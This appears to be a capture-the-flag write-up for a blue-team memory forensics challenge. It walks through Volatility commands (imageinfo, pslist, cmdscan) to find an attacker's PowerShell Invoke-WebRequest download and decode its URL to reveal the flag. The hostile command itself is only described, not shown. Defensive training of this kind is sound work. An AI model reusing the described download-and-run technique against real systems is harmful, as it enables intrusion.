Challenge 3 of the Intro to Blue Team Track
Description:
We spotted a suspicious connection to one of our servers, and immediately took a memory dump. Can you figure out what the attackers were up to?
Here we go!
Like always with these, download the files. This time it appears to be a .raw file.
For this analysis we are going to use Volatility.
You can download it from here -> https://www.volatilityfoundation.org/releases (or it can also be installed from Github).
To make things simple, I’ve renamed the standalone executable to “vol.exe” and the memory dump to “dump.raw”
Here is the basic syntax: .\vol.exe -f <filename> — profile:<profile> command (or vol.py depending on how you installed it).
The only information we’re missing here is the profile. Don’t fret! Volatility can scan and guess the best profile to use.
Run this command:
.\vol.exe imageinfo -f <path to memory dump>
The suggested profile for this dump is Win7SP1x64
First, we should check what processes were running when the memory was dumped.
One of the commands that will allow us to do this is the “plist” command.
.\vol.exe -f <path to memory dump> –profile=Win7SP1x64 plistYou should see something like this:
You can also output this to a text file by simply adding > output.txt to the end of the last command. (I advise exporting everything you can so you don’t have to rerun commands if you need to go back).
If you would like to see the process tree just replace “pslist” with “pstree” in the command.
Since cmd.exe was running, let’s see if anything suspicious is still hanging around in memory from that process. For this, we simply use cmdscan
.\vol.exe -f <path to memory dump> - profile=Win7SP1x64 cmdscan > cmdscan-output.txt
We can see where a suspicious iwr (Invoke-WebRequest) command was used to download a PowerShell script from a shortened URL.
Let’s use CyberChef to get this back to a readable URL:
Looks like we have some base64 code in the URL as well.
Let’s convert that:
Oh…well…I guess that’s where this challenge ends…there’s the flag!
On to the next.
